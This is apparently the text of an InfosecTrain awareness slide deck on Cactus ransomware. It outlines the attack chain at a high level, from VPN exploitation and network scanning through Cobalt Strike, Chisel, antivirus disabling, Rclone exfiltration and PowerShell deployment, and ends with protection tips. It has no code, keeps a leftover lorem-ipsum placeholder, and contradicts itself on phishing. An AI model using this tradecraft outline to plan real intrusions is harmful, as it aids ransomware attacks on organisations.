Title: HACKER’S HEIST CACTUS RANSOMWARE
1HACKERS HEIST
learntorise
US
CRANASOMCWARTE
0 0 1 0 0 1 0 0 1 0 0 1
1 1 0 1 1 0 1 1 0 1 1 0
1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1
0 1 0 1 0 1 0 1 0 1 0 1 0 1 0 1
0 0 0 0 0 0 0 0 0 0 0 0
1 1 1 1 0 1 1 1 1 0 1 1 1 1 0 1 1 1 1 0
1 0 1 0 1 0 1 0
0 0 0 0 0 0 0 0
0 0 1 0 0 1 0 0 1 0 0 1
1 1 1 1 1 1 1 1
0 0 1 1 0 0 1 1 0 0 1 1 0 0 1 1
1 0 1 0 1 0 1 0
0 0 0 0 0 0 0 0
1 1 0 1 1 0 1 1 0 1 1 0
1 1 1 0 1 1 1 0 1 1 1 0 1 1 1 0
0 0 0 0
0 1 0 1 0 1 0 1
1 1 1 0 1 1 1 0 1 1 1 0 1 1 1 0
1 1 1 0 1 1 1 0 1 1 1 0 1 1 1 0
0 0 0 0 0 0 0 0
PAY FOR UNLOCK
2WHAT IS
www.infosectrain.com
learntorise
CACTUS
RANSOMWARE
Cactus Ransomware sets itself apart with its
distinctive encryption methods, making it
difficult to detect by security tools. It
exploits VPN vulnerabilities to infiltrate
networks instead of relying on phishing emails,
and it possesses the uncommon ability to
self-encrypt, enhancing its chances of
remaining undetected on compromised systems.
LOREM IPSUM Lorem ipsum dolor sit amet,
consectetur adipiscing elit, sed diam nonummy
3CACTUS
www.infosectrain.com
learntorise
RANSOMWARE Attack Tactics Techniques Procedures
STEP 1 The attacker gets into the victim's
network using a weakness in a VPN appliance. They
do this by taking advantage of
known vulnerabilities in VPN appliances that
haven't been fixed or updated.
VPN
CONNECT
4STEP 2
www.infosectrain.com
learntorise
The attacker conducts an internal network scan
using tools like SoftPerfect Network Scanner or
PSnmap to create a map of the environment.
STEP 3 The attacker installs the
Cactus ransomware on the victim's system. This
can be done through various methods, such as
phishing emails, malicious attachments, or
drive by downloads.
!
5STEP 4
www.infosectrain.com
learntorise
The attacker installs Remote Monitoring and
Management (RMM) tools on compromised systems,
enabling remote access and file pushing
capabilities.
STEP 5 To facilitate lateral movement, the
attacker deploys the CobaltStrike
post-exploitation framework and Chisel proxying
tool.
6STEP 6
www.infosectrain.com
learntorise
The attacker executes a script to disable widely
used anti-virus tools to decrease the chances of
their tools being detected and blocked.
STEP 7 The attacker employs the Rclone tool to
conduct data theft from the environment,
automating the process for data exfiltration.
7STEP 8
www.infosectrain.com
learntorise
The attacker utilizes a PowerShell script to
distribute ransomware across all systems within
the environment.
8CACTUS
www.infosectrain.com
learntorise
TIPS TO PROTECT YOURSELF FROM
RANSOMWARE
- Keeping VPN appliances up to
- date with the latest security patches.
- Using network monitoring tools to detect
suspicious activity. - Educating yourself about ransomware attacks.
- Implementing strong password policies
- and enforcing multi-factor authentication.
01 02 03 04
9FOUND THIS USEFUL?
Get More Insights Through Our FREE Courses
Workshops eBooks Checklists Mock Tests
LIKE
SHARE
FOLLOW